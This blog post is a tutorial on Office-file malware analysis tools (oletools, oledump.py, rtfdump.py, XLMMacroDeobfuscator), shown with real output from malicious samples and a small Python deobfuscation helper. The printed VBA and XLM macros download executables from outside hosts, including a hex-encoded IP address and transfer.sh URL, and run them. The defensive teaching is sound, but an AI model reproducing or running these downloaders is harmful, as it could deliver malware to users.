Office-file malware such as Emotet and Qakbot has been on the rise, so this post introduces tools that are useful for analyzing Office files.
oletools
A package bundling a variety of tools for analyzing OLE files.
It runs on Python and can be installed with pip.
Describing every tool would get long, so only some of them are covered here.
oleid
Checks an OLE file for suspicious parts.
C:\Users\masaomi\Downloads>oleid sample.xls
oleid 0.60.dev1 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
Filename: sample.xls
--------------------+--------------------+----------+--------------------------
Indicator |Value |Risk |Description
--------------------+--------------------+----------+--------------------------
File format |MS Excel 97-2003 |info |
|Workbook or Template| |
--------------------+--------------------+----------+--------------------------
Container format |OLE |info |Container type
--------------------+--------------------+----------+--------------------------
Application name |Microsoft Excel |info |Application name declared
| | |in properties
--------------------+--------------------+----------+--------------------------
Properties code page|1252: ANSI Latin 1; |info |Code page used for
|Western European | |properties
|(Windows) | |
--------------------+--------------------+----------+--------------------------
Encrypted |False |none |The file is not encrypted
--------------------+--------------------+----------+--------------------------
VBA Macros |Yes, suspicious |HIGH |This file contains VBA
| | |macros. Suspicious
| | |keywords were found. Use
| | |olevba and mraptor for
| | |more info.
--------------------+--------------------+----------+--------------------------
XLM Macros |No |none |This file does not contain
| | |Excel 4/XLM macros.
--------------------+--------------------+----------+--------------------------
External |0 |none |External relationships
Relationships | | |such as remote templates,
| | |remote OLE objects, etc
--------------------+--------------------+----------+--------------------------
olevba
Extracts the VBA macro code and checks it for suspicious parts.
C:\Users\masaomi\Downloads>olevba sample.xls
olevba 0.60 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: sample.xls
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: sample.xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Sheet2.cls
in file: sample.xls - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Workbook_BeforeClose(Cancel As Boolean)
With ActiveSheet
Dim Prog As String
For Each c In .Comments
If InStr(4, c.Text, "W", 1) Then
Prog = c.Text
CreateObject(c.Text).UILevel = 2
End If
If InStr(4, c.Text, ":", 1) Then
CreateObject(Prog).InstallProduct c.Text
End If
Next
End With
End Sub
-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |Workbook_BeforeClose|Runs when the Excel Workbook is closed |
|Suspicious|CreateObject |May create an OLE object |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
+----------+--------------------+---------------------------------------------+
oleobj
Extracts the objects contained in an OLE file.
C:\Users\masaomi\Downloads>oleobj sample.xlsm
oleobj 0.56.1 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
-------------------------------------------------------------------------------
File: 'sample.xlsm'
Found relationship 'hyperlink' with external link hxxps://○○○.com/wp-admin/A8/%22,%22
Found relationship 'hyperlink' with external link hxxp://○○○.com/replace/fVea/%22,%22
Found relationship 'hyperlink' with external link hxxp://○○○.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/%22,%22
Found relationship 'hyperlink' with external link hxxp://www.○○○.com/wp-content/Y/%22,%22
Found relationship 'hyperlink' with external link hxxp://www.○○○.com/thegrandbrands/eGd55tEm9qkPNOhViP/%22,%22
Found relationship 'hyperlink' with external link hxxp://www.○○○.com/wp-includes/HLDoANj/%22,%22
Note: parts of the URLs have been replaced.
rtfobj
Extracts the objects contained in an RTF file.
C:\Users\masaomi\Downloads>rtfobj sample.doc
rtfobj 0.60 on Python 3.8.10 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
===============================================================================
File: 'sample.doc' - size: 223241 bytes
---+----------+---------------------------------------------------------------
id |index |OLE Object
---+----------+---------------------------------------------------------------
0 |0000095Dh |format_id: 2 (Embedded)
| |class name: b'package'
| |data size: 15717
| |OLE Package object:
| |Filename: 'abdtfhgYgeghDp\x8d.scT'
| |Source path: 'C:\\nsdsTggH\\abdtfhgYgeghDp\x8d.scT'
| |Temp path = 'C:\\CekepaD\x87\\abdtfhgYgeghDp\x8d.scT'
| |MD5 = '789d9c850c8dc9bdeb4a89df5fbab578'
| |EXECUTABLE FILE
| |File Type: Unknown file type
---+----------+---------------------------------------------------------------
1 |00008A01h |format_id: 2 (Embedded)
| |class name: b'OLE2LInk'
| |data size: 2560
| |MD5 = 'a2665c0164f8e68c32273b9b696d9d9e'
| |CLSID: 00000300-0000-0000-C000-000000000046
| |StdOleLink (embedded OLE object - Known Related to
| |CVE-2017-0199, CVE-2017-8570, CVE-2017-8759 or CVE-2018-8174)
---+----------+---------------------------------------------------------------
olebrowse
SSView
Tools for viewing and editing the data streams of an OLE file.
They also display embedded images, HTML, and the like.
pcodedmp/pcode2code
pcodedmp disassembles VBA macro code, and pcode2code decompiles it.
pcodedmp
C:\Users\masaomi\Downloads>pcodedmp sample.xls
Processing file: sample.xls
===============================================================================
dir stream: _VBA_PROJECT_CUR/VBA/dir
-------------------------------------------------------------------------------
dir stream after decompression:
1358 bytes
dir stream parsed:
00000000: PROJ_SYSKIND:
00000000 01 00 00 00 ....
0000000A: PROJ_LCID:
00000000 09 04 00 00 ....
00000014: PROJ_LCIDINVOKE:
00000000 09 04 00 00 ....
0000001E: PROJ_CODEPAGE:
00000000 E4 04 ..
00000026: PROJ_NAME:
00000000 56 42 41 50 72 6F 6A 65 63 74 VBAProject
00000036: PROJ_DOCSTRING
0000003C: PROJ_UNICODE_DOCSTRING
00000042: PROJ_HELPFILE
00000048: PROJ_UNICODE_HELPFILE
0000004E: PROJ_HELPCONTEXT:
00000000 00 00 00 00 ....
00000058: PROJ_LIBFLAGS:
00000000 00 00 00 00 ....
00000062: PROJ_VERSION:
00000000 58 FF 4F 64 0D 00 X.Od..
0000006E: PROJ_CONSTANTS
00000074: PROJ_UNICODE_CONSTANTS
0000007A: PROJ_REFNAME_PROJ:
00000000 73 74 64 6F 6C 65 stdole
00000086: PROJ_UNICODE_REFNAME_PROJ:
00000000 73 00 74 00 64 00 6F 00 6C 00 65 00 s.t.d.o.l.e.
00000098: PROJ_LIBID_REGISTERED:
00000000 5E 00 00 00 2A 5C 47 7B 30 30 30 32 30 34 33 30 ^...*\G{00020430
00000010 2D 30 30 30 30 2D 30 30 30 30 2D 43 30 30 30 2D -0000-0000-C000-
00000020 30 30 30 30 30 30 30 30 30 30 34 36 7D 23 32 2E 000000000046}#2.
00000030 30 23 30 23 43 3A 5C 57 69 6E 64 6F 77 73 5C 53 0#0#C:\Windows\S
00000040 79 73 57 4F 57 36 34 5C 73 74 64 6F 6C 65 32 2E ysWOW64\stdole2.
00000050 74 6C 62 23 4F 4C 45 20 41 75 74 6F 6D 61 74 69 tlb#OLE Automati
00000060 6F 6E 00 00 00 00 00 00 on......
00000106: PROJ_REFNAME_PROJ:
00000000 4F 66 66 69 63 65 Office
00000112: PROJ_UNICODE_REFNAME_PROJ:
00000000 4F 00 66 00 66 00 69 00 63 00 65 00 O.f.f.i.c.e.
00000124: PROJ_LIBID_REGISTERED:
00000000 9A 00 00 00 2A 5C 47 7B 32 44 46 38 44 30 34 43 ....*\G{2DF8D04C
00000010 2D 35 42 46 41 2D 31 30 31 42 2D 42 44 45 35 2D -5BFA-101B-BDE5-
00000020 30 30 41 41 30 30 34 34 44 45 35 32 7D 23 32 2E 00AA0044DE52}#2.
00000030 30 23 30 23 43 3A 5C 50 72 6F 67 72 61 6D 20 46 0#0#C:\Program F
00000040 69 6C 65 73 20 28 78 38 36 29 5C 43 6F 6D 6D 6F iles (x86)\Commo
00000050 6E 20 46 69 6C 65 73 5C 4D 69 63 72 6F 73 6F 66 n Files\Microsof
00000060 74 20 53 68 61 72 65 64 5C 4F 46 46 49 43 45 31 t Shared\OFFICE1
00000070 32 5C 4D 53 4F 2E 44 4C 4C 23 4D 69 63 72 6F 73 2\MSO.DLL#Micros
00000080 6F 66 74 20 4F 66 66 69 63 65 20 31 32 2E 30 20 oft Office 12.0
00000090 4F 62 6A 65 63 74 20 4C 69 62 72 61 72 79 00 00 Object Library..
000000A0 00 00 00 00 ....
(remainder omitted)
Adding -d disassembles only the p-code.
C:\Users\masaomi\Downloads>pcodedmp -d sample.xls
Processing file: sample.xls
===============================================================================
Module streams:
_VBA_PROJECT_CUR/VBA/ThisWorkbook - 3553 bytes
Line #0:
FuncDefn (Private Sub jkmyjkgeozuikp())
Line #1:
Dim
VarDefn abzpluxvhrslhaqrd (As String)
Line #2:
Dim
VarDefn dzclesss (As String)
Line #3:
Dim
VarDefn aemngpsicijyqastoqi (As Object)
VarDefn oklqeyqirsr (As Object)
Line #4:
Dim
VarDefn zuqxesnr (As Integer)
Line #5:
LitStr 0x003E "68747470733a2f2f7472616e736665722e73682f796c6a7548752f30303031"
ArgsLd ggwyizkwoeai 0x0001
LitStr 0x0016 "4b4c43323032322e657865"
ArgsLd ggwyizkwoeai 0x0001
Concat
St abzpluxvhrslhaqrd
(remainder omitted)
pcode2code
pcode2code decompiles the VBA macro code from the output of pcodedmp.
C:\Users\masaomi\Downloads>pcode2code sample.xls
stream : _VBA_PROJECT_CUR/VBA/ThisWorkbook - 3553 bytes
########################################
Private Sub jkmyjkgeozuikp()
Dim abzpluxvhrslhaqrd As String
Dim dzclesss As String
Dim aemngpsicijyqastoqi As Object, oklqeyqirsr As Object
Dim zuqxesnr As Integer
abzpluxvhrslhaqrd = ggwyizkwoeai("68747470733a2f2f7472616e736665722e73682f796c6a7548752f30303031") & ggwyizkwoeai("4b4c43323032322e657865")
dzclesss = ggwyizkwoeai("6b") & ggwyizkwoeai("6c632e657865")
dzclesss = Environ("TEMP") & "\" & dzclesss
Set aemngpsicijyqastoqi = CreateObject(ggwyizkwoeai("4d53584d4c322e536572766572") & ggwyizkwoeai("584d4c485454502e362e30"))
aemngpsicijyqastoqi.setOption(2) = 13056
aemngpsicijyqastoqi.Open ggwyizkwoeai("474554"), abzpluxvhrslhaqrd, False
aemngpsicijyqastoqi.setRequestHeader ggwyizkwoeai("557365") & ggwyizkwoeai("722d4167656e74"), ggwyizkwoeai("4d6f7a69") & ggwyizkwoeai("6c6c612f342e302028636f6d70617469626c653b204d53494520362e303b2057696e646f7773204e5420352e3029")
aemngpsicijyqastoqi.Send
If aemngpsicijyqastoqi.Status = 200 Then
Set oklqeyqirsr = CreateObject(ggwyizkwoeai("41") & ggwyizkwoeai("444f44422e53747265616d"))
oklqeyqirsr.Open
oklqeyqirsr.Type = 1
oklqeyqirsr.Xor aemngpsicijyqastoqi.ResponseBody
oklqeyqirsr.SaveToFile dzclesss, 2
oklqeyqirsr.Close
mxjnxrbn dzclesss
End If
End Sub
(remainder omitted)
XLMMacroDeobfuscator
A tool that decodes obfuscated XLM macros.
It is also bundled with oletools.
C:\Users\masaomi\Downloads>xlmdeobfuscator --file sample.xls
XLMMacroDeobfuscator(v0.2.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
File: C:\Users\masaomi\Downloads\sample.xls
Unencrypted xls file
[Loading Cells]
auto_open: auto_open->'EGVEB'!$D$1
[Starting Deobfuscation]
CELL:D5 , FullEvaluation , "False"
CELL:D9 , FullEvaluation , CALL("urlmon","URLDownloadToFileA,JJCCBB",0,"hxxp://○○○.com/wp-content/Cw3aR6792f/","..\nhth.dll",0,0)
CELL:D11 , FullEvaluation , IF(UJFD1<0,CALL("urlmon","URLDownloadToFileA,JJCCBB",0,"h"&"tt"&"p:/"&"/○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○.○"&"○"&"○/i"&"n"&"v"&"o"&"i"&"c"&"e/"&"m/","..\nhth.dll",0,0))
CELL:D13 , FullEvaluation , IF(UJFD2<0,CALL("urlmon","URLDownloadToFileA,JJCCBB",0,"h"&"tt"&"p:/"&"/○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○.○"&"○"&"○/d"&"o"&"w"&"n"&"l"&"o"&"a"&"d"&"s/8"&"d"&"R9"&"p"&"g"&"N"&"B"&"F"&"t"&"z/","..\nhth.dll",0,0))
CELL:D15 , FullEvaluation , IF(UJFD3<0,CALL("urlmon","URLDownloadToFileA,JJCCBB",0,"h"&"t"&"tp"&"s:/"&"/○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○.○"&"○"&"○/w"&"p-in"&"clu"&"de"&"s/v"&"2"&"q"&"F"&"A"&"l"&"M"&"Z"&"E"&"L"&"R"&"k"&"xb"&"z/","..\nhth.dll",0,0))
CELL:D17 , FullEvaluation , IF(UJFD4<0,CALL("urlmon","URLDownloadToFileA,JJCCBB",0,"h"&"tt"&"p:/"&"/○"&"○"&"○"&"○"&"○"&"○.○"&"○"&"○"&"○"&"○"&"○"&"○"&"○.○"&"○"&"○/w"&"p-c"&"o"&"n"&"t"&"e"&"n"&"t/s"&"S"&"J"&"q"&"J/","..\nhth.dll",0,0))
CELL:D19 , FullEvaluation , IF(UJFD5<0,CALL("urlmon","URLDownloadToFileA,JJCCBB",0,"h"&"tt"&"p:/"&"/○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○"&"○.○"&"○"&"○/w"&"p-i"&"n"&"cl"&"u"&"d"&"e"&"s/T"&"5"&"q"&"X"&"A"&"R"&"8"&"p"&"5/","..\nhth.dll",0,0))
CELL:D23 , FullEvaluation , IF(UJFD6<0,CLOSE(0),)
CELL:D25 , PartialEvaluation , =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\nhth.dll")
CELL:D29 , FullEvaluation , RETURN()
Files:
[END of Deobfuscation]
time elapsed: 0.2964000701904297
Note: parts of the URLs and strings have been replaced.
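As an added example (not from the post or from any of the tools above), the following Python helper does the two manual steps that usually come after the pcode2code output and the XLM output shown above: decode every call to the macro's own hex-to-string helper (ggwyizkwoeai in the pcode2code listing; the oledump.py sample later on uses rkixcetefmdfoip, so the name is a parameter) and then fold the "a" & "b" concatenations into single literals, which also flattens the "h"&"tt"&"p:/" style used in the XLM cells. The VBA sample lines are copied from the pcode2code output above; the XLM line is constructed with the same shape as the CELL:D11 formula and the placeholder host example.invalid in place of the replaced one.

```python
import re
from typing import List

# Sample input: lines from the pcode2code output above, where ggwyizkwoeai is the
# macro's own hex-to-string function.
VBA_SAMPLE = "\n".join([
    'Set aemngpsicijyqastoqi = CreateObject(ggwyizkwoeai("4d53584d4c322e536572766572") & ggwyizkwoeai("584d4c485454502e362e30"))',
    'aemngpsicijyqastoqi.Open ggwyizkwoeai("474554"), abzpluxvhrslhaqrd, False',
    'aemngpsicijyqastoqi.setRequestHeader ggwyizkwoeai("557365") & ggwyizkwoeai("722d4167656e74"), ggwyizkwoeai("4d6f7a69") & ggwyizkwoeai("6c6c612f342e302028636f6d70617469626c653b204d53494520362e303b2057696e646f7773204e5420352e3029")',
    'Set oklqeyqirsr = CreateObject(ggwyizkwoeai("41") & ggwyizkwoeai("444f44422e53747265616d"))',
])
# Constructed XLM line in the shape of CELL:D11 above; example.invalid stands in
# for the masked host.
XLM_SAMPLE = (
    r'IF(UJFD1<0,CALL("urlmon","URLDownloadToFileA,JJCCBB",0,"h"&"tt"&"p:/"&"/ex"&"am"'
    r'&"ple.in"&"valid/i"&"n"&"v"&"o"&"i"&"c"&"e/"&"m/","..\nhth.dll",0,0))'
)


def decode_hex_calls(line: str, helper: str) -> str:
    """Replace every helper("<hex>") call with the decoded VBA string literal."""
    # The payload must be an even number of hex digits, or bytes.fromhex() fails.
    call = re.compile(re.escape(helper) + r'\(\s*"((?:[0-9A-Fa-f]{2})+)"\s*\)')

    def repl(m: re.Match) -> str:
        text = bytes.fromhex(m.group(1)).decode("latin-1")
        return '"' + text.replace('"', '""') + '"'   # VBA doubles quotes inside strings

    return call.sub(repl, line)


# "a" & "b" (VBA) or "a"&"b" (XLM); "" inside a literal is an escaped quote.
_CONCAT = re.compile(r'"((?:[^"]|"")*)"\s*&\s*"((?:[^"]|"")*)"')


def fold_concats(line: str) -> str:
    """Merge adjacent string literals joined with & until nothing changes."""
    while True:
        folded = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', line)
        if folded == line:
            return folded
        line = folded


def deobfuscate(source: str, helper: str = "") -> str:
    """Decode helper("<hex>") calls (if a helper name is given), then fold concatenations."""
    out = []
    for line in source.splitlines():
        if helper:
            line = decode_hex_calls(line, helper)
        out.append(fold_concats(line))
    return "\n".join(out)


def string_literals(source: str) -> List[str]:
    """Every string literal left after deobfuscation, in order, for IoC review."""
    return [s.replace('""', '"') for s in re.findall(r'"((?:[^"]|"")*)"', source)]


if __name__ == "__main__":
    print(deobfuscate(VBA_SAMPLE, "ggwyizkwoeai"))
    print(deobfuscate(XLM_SAMPLE))
```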
DidierStevensSuite
A package bundling tools that are useful for analyzing all sorts of things.
Of these, the ones that are useful for analyzing Office files are introduced here.
oledump.py
Analyzes OLE files.
Run without any options, it lists the data streams.
A stream number marked M or m indicates that the stream holds a macro.
It is M when the module contains statements other than Attribute and Option statements, and m when it does not.
C:\Users\masaomi\Downloads\DidierStevensSuite>oledump.py sample.xls
1: 102 '\x01CompObj'
2: 236 '\x05DocumentSummaryInformation'
3: 180 '\x05SummaryInformation'
4: 16381 'Workbook'
5: 449 '_VBA_PROJECT_CUR/PROJECT'
6: 77 '_VBA_PROJECT_CUR/PROJECTwm'
7: 2813 '_VBA_PROJECT_CUR/VBA/_VBA_PROJECT'
8: 1545 '_VBA_PROJECT_CUR/VBA/__SRP_0'
9: 155 '_VBA_PROJECT_CUR/VBA/__SRP_1'
10: 170 '_VBA_PROJECT_CUR/VBA/__SRP_2'
11: 170 '_VBA_PROJECT_CUR/VBA/__SRP_3'
12: M 1345 '_VBA_PROJECT_CUR/VBA/abdfiihow'
13: 563 '_VBA_PROJECT_CUR/VBA/dir'
14: m 990 '_VBA_PROJECT_CUR/VBA/Лист1'
15: M 2375 '_VBA_PROJECT_CUR/VBA/ЭтаКнига'
Adding "-s <stream number>" shows the contents of that stream.
C:\Users\masaomi\Downloads\DidierStevensSuite>oledump.py -s 1 sample.xls
00000000: 01 00 FE FF 03 0A 00 00 FF FF FF FF 20 08 02 00 ............ ...
00000010: 00 00 00 00 C0 00 00 00 00 00 00 46 1A 00 00 00 ...........F....
00000020: CB E8 F1 F2 20 4D 69 63 72 6F 73 6F 66 74 20 45 .... Microsoft E
00000030: 78 63 65 6C 20 32 30 30 33 00 06 00 00 00 42 69 xcel 2003.....Bi
00000040: 66 66 38 00 0E 00 00 00 45 78 63 65 6C 2E 53 68 ff8.....Excel.Sh
00000050: 65 65 74 2E 38 00 F4 39 B2 71 00 00 00 00 00 00 eet.8..9.q......
00000060: 00 00 00 00 00 00 ......
Adding "-S" extracts just the strings.
C:\Users\masaomi\Downloads\DidierStevensSuite>oledump.py -s 1 -S sample.xls
Microsoft Excel 2003
Biff8
Excel.Sheet.8
Adding "-v" displays the VBA macro.
C:\Users\masaomi\Downloads\DidierStevensSuite>oledump.py -s 15 -v sample.xls
Attribute VB_Name = "????????"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
Application.ScreenUpdating = False
Dim xHttp: Set jgccsmkbfbunzevjs = CreateObject(rkixcetefmdfoip("4d6963726f736f66742e584d") & rkixcetefmdfoip("4c48545450"))
Dim bStrm: Set ecxtnnvma = CreateObject(rkixcetefmdfoip("41646f64") & rkixcetefmdfoip("622e53747265616d"))
jgccsmkbfbunzevjs.Open rkixcetefmdfoip("474554"), rkixcetefmdfoip("687474703a") & rkixcetefmdfoip("2f2f3136382e3130302e382e34322f737069736f6b2e657865"), False
jgccsmkbfbunzevjs.Send
Dim leicqooi As String
leicqooi = Environ("AppData")
With ecxtnnvma
.Type = 1
.Open
.write jgccsmkbfbunzevjs.responseBody
.savetofile leicqooi & rkixcetefmdfoip("5c72756e73782e65") & rkixcetefmdfoip("7865"), 2
End With
Shell (leicqooi & rkixcetefmdfoip("5c72") & rkixcetefmdfoip("756e73782e657865"))
Application.ScreenUpdating = True
End Sub
rtfdump.py
Analyzes RTF files.
Its options are similar to those of oledump.py.
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py sample.doc
1 Level 1 c= 7 p=00000000 l= 223239 h= 219001; 135857 b= 0 u= 292 \rtf
2 Level 2 c= 0 p=000000b2 l= 1644 h= 158; 23 b= 0 u= 203 \lsdlockedexcept
3 Level 2 c= 1 p=000007e6 l= 177 h= 34; 8 b= 0 u= 65 \rtlch
4 Level 3 c= 0 p=00000877 l= 17 h= 6; 2 b= 0 u= 7 \b
5 Level 2 c= 2 p=000008ab l= 32939 h= 31514; 286 b= 0 O u= 0 \object
Name: b'package\x00' Size: 15717 md5: a47631a4dcc39d2f2704709899b91cf6 magic: 02006162
6 Level 3 c= 0 p=000008bf l= 145 h= 0; 10 b= 0 u= 0 \objw1
7 Level 3 c= 0 p=00000954 l= 32761 h= 31514; 286 b= 0 O u= 0 \objdata
Name: b'package\x00' Size: 15717 md5: a47631a4dcc39d2f2704709899b91cf6 magic: 02006162
8 Level 2 c= 2 p=00008958 l= 5442 h= 5270; 4154 b= 0 u= 14 \object
9 Level 3 c= 0 p=00008967 l= 27 h= 5; 1 b= 0 u= 10 \*\objclass Word.Document.8
10 Level 3 c= 1 p=00008984 l= 5397 h= 5267; 4154 b= 0 u= 4 \objdat
11 Level 4 c= 2 p=0000898e l= 5386 h= 5265; 4154 b= 0 O u= 4 \dptxbxtext
Name: b'OLE2LInk\x00' Size: 2560 md5: a2665c0164f8e68c32273b9b696d9d9e magic: d0cf11e0
12 Level 5 c= 0 p=000089dd l= 6 h= 0; 0 b= 0 u= 2 \ud
13 Level 5 c= 0 p=000089ef l= 6 h= 0; 0 b= 0 u= 2 \ud
14 Level 2 c= 1 p=00009e9e l= 24862 h= 24599; 24595 b= 0 u= 10 \shprslt
15 Level 3 c= 1 p=00009ea7 l= 24852 h= 24599; 24595 b= 0 u= 10 \*\do
16 Level 4 c= 1 p=00009ed5 l= 24805 h= 24599; 24595 b= 0 u= 10 \dptxbxtext
17 Level 5 c= 1 p=00009f1e l= 24731 h= 24599; 24595 b= 0 u= 10 \pard
18 Level 6 c= 2 p=00009f5c l= 24668 h= 24599; 24595 b= 0 u= 10 \object
19 Level 7 c= 0 p=00009f7f l= 26 h= 4; 1 b= 0 u= 10 \*\objclass Word.Picture.8
20 Level 7 c= 0 p=00009f9b l= 24604 h= 24596; 24595 b= 0 u= 1 \objda
21 Level 2 c= 1 p=0000ffbe l= 21693 h= 21537; 21537 b= 0 u= 0 \pict
22 Level 3 c= 0 p=0001004e l= 21548 h= 21537; 21537 b= 0 u= 0 \*\blipuid
23 Level 2 c= 1 p=0001547d l= 136071 h= 135889; 135857 b= 0 u= 0 \nonshppict
24 Level 3 c= 1 p=00015489 l= 136058 h= 135889; 135857 b= 0 u= 0 \pict
25 Level 4 c= 0 p=00015526 l= 43 h= 32; 32 b= 0 u= 0 \*\blipuid
Adding "-O" shows only the entries that contain objects.
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py -O sample.doc
1: Name: b'package\x00'
Magic: b'02006162'
Size: 15717
Hash: md5 a47631a4dcc39d2f2704709899b91cf6
2: Name: b'OLE2LInk\x00'
Magic: b'd0cf11e0'
Size: 2560
Hash: md5 a2665c0164f8e68c32273b9b696d9d9e
Adding "-s <stream number>" shows the contents of that stream.
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py -s 3 sample.doc
00000000: 5C 66 63 73 31 20 5C 61 66 33 31 35 30 37 20 5C \fcs1 \af31507 \
00000010: 6C 74 72 63 68 5C 66 63 73 30 20 5C 69 6E 73 72 ltrch\fcs0 \insr
00000020: 73 69 64 34 39 33 32 35 39 33 20 0D 0A 4D 69 63 sid4932593 ..Mic
00000030: 72 6F 73 6F 66 74 20 4F 66 66 69 63 65 20 64 6F rosoft Office do
00000040: 65 73 20 6E 6F 74 20 77 6F 72 6B 20 69 6E 20 65 es not work in e
00000050: 6D 61 69 6C 20 50 72 65 76 69 65 77 2E 5C 6C 69 mail Preview.\li
00000060: 6E 65 20 50 6C 65 61 73 65 20 64 6F 77 6E 6C 6F ne Please downlo
00000070: 61 64 20 74 68 65 20 64 6F 63 75 6D 65 6E 74 20 ad the document
00000080: 61 6E 64 20 63 6C 69 63 6B 20 7B 5C 62 20 45 6E and click {\b En
00000090: 61 62 6C 65 20 45 64 69 74 69 6E 67 7D 20 77 68 able Editing} wh
000000A0: 65 6E 20 6F 70 65 6E 69 6E 67 2E en opening.
Adding "-H" decodes the hex-encoded content.
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py -s 7 -H sample.doc
00000000: 01 05 00 00 02 00 00 00 08 00 00 00 70 61 63 6B ............pack
00000010: 61 67 65 00 00 00 00 00 00 00 00 00 65 3D 00 00 age.........e=..
00000020: 02 00 61 62 64 74 66 68 67 59 67 65 67 68 44 70 ..abdtfhgYgeghDp
00000030: 8D 2E 73 63 54 00 43 3A 5C 6E 73 64 73 54 67 67 ..scT.C:\nsdsTgg
00000040: 48 5C 61 62 64 74 66 68 67 59 67 65 67 68 44 70 H\abdtfhgYgeghDp
00000050: 8D 2E 73 63 54 00 00 00 03 00 20 00 00 00 43 3A ..scT..... ...C:
00000060: 5C 43 65 6B 65 70 61 44 87 5C 61 62 64 74 66 68 \CekepaD.\abdtfh
00000070: 67 59 67 65 67 68 44 70 8D 2E 73 63 54 00 9E 78 gYgeghDp..scT..x
00000080: 00 00 0D 0A 3C 73 63 72 69 70 74 6C 65 54 0D 0A ....<scriptleT..
00000090: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3E >
000000A0: 0D 0A 3C 73 63 72 69 70 74 20 6C 61 6E 67 75 61 ..<script langua
000000B0: 67 65 20 3D 20 27 76 62 73 63 72 69 70 74 27 3E ge = 'vbscript'>
000000C0: 0D 0A 0D 0A 66 73 64 66 64 73 66 73 20 3D 20 22 ....fsdfdsfs = "
000000D0: 61 48 52 30 55 44 6F 76 4C 33 64 6C 62 47 78 6A aHR0UDovL3dlbGxj
000000E0: 59 57 78 73 63 79 35 6A 62 32 30 76 55 6D 56 6C YWxscy5jb20vUmVl
000000F0: 62 47 5A 79 59 57 31 6C 4C 6D 56 34 5A 51 3D 3D bGZyYW1lLmV4ZQ==
00000100: 22 20 27 6E 63 6D 78 62 36 35 37 34 0D 0A 79 75 " 'ncmxb6574..yu
00000110: 6C 6B 79 74 6A 74 72 68 74 6A 72 6B 64 73 61 72 lkytjtrhtjrkdsar
00000120: 6A 6B 79 20 3D 22 55 6D 56 6C 62 47 5A 79 59 57 jky ="UmVlbGZyYW
00000130: 31 6C 4C 6D 56 34 5A 51 3D 3D 22 20 27 6E 63 6D 1lLmV4ZQ==" 'ncm
00000140: 78 62 36 35 37 34 0D 0A 0D 0A 6D 6A 66 76 79 67 xb6574....mjfvyg
00000150: 67 68 65 62 6A 74 65 66 20 3D 20 22 62 22 0D 0A ghebjtef = "b"..
00000160: 77 73 6C 61 75 73 66 79 63 68 6B 73 20 3D 20 6D wslausfychks = m
00000170: 6A 66 76 79 67 67 68 65 62 6A 74 65 66 20 2B 20 jfvygghebjtef +
00000180: 22 69 6E 22 0D 0A 77 73 6C 61 75 73 66 79 63 68 "in"..wslausfych
00000190: 6B 73 20 3D 20 77 73 6C 61 75 73 66 79 63 68 6B ks = wslausfychk
000001A0: 73 20 2B 20 22 2E 22 0D 0A 77 73 6C 61 75 73 66 s + "."..wslausf
000001B0: 79 63 68 6B 73 20 3D 20 77 73 6C 61 75 73 66 79 ychks = wslausfy
000001C0: 63 68 6B 73 20 2B 20 6D 6A 66 76 79 67 67 68 65 chks + mjfvygghe
000001D0: 62 6A 74 65 66 0D 0A 77 73 6C 61 75 73 66 79 63 bjtef..wslausfyc
000001E0: 68 6B 73 20 3D 20 77 73 6C 61 75 73 66 79 63 68 hks = wslausfych
000001F0: 6B 73 20 2B 20 22 61 22 0D 0A 77 73 6C 61 75 73 ks + "a"..wslaus
00000200: 66 79 63 68 6B 73 20 3D 20 77 73 6C 61 75 73 66 fychks = wslausf
00000210: 79 63 68 6B 73 20 2B 20 22 73 22 0D 0A 77 73 6C ychks + "s"..wsl
00000220: 61 75 73 66 79 63 68 6B 73 20 3D 20 77 73 6C 61 ausfychks = wsla
00000230: 75 73 66 79 63 68 6B 73 20 2B 20 22 65 22 0D 0A usfychks + "e"..
00000240: 77 73 6C 61 75 73 66 79 63 68 6B 73 20 3D 20 77 wslausfychks = w
00000250: 73 6C 61 75 73 66 79 63 68 6B 73 20 2B 20 22 36 slausfychks + "6
00000260: 22 0D 0A 77 73 6C 61 75 73 66 79 63 68 6B 73 20 "..wslausfychks
00000270: 3D 20 77 73 6C 61 75 73 66 79 63 68 6B 73 20 2B = wslausfychks +
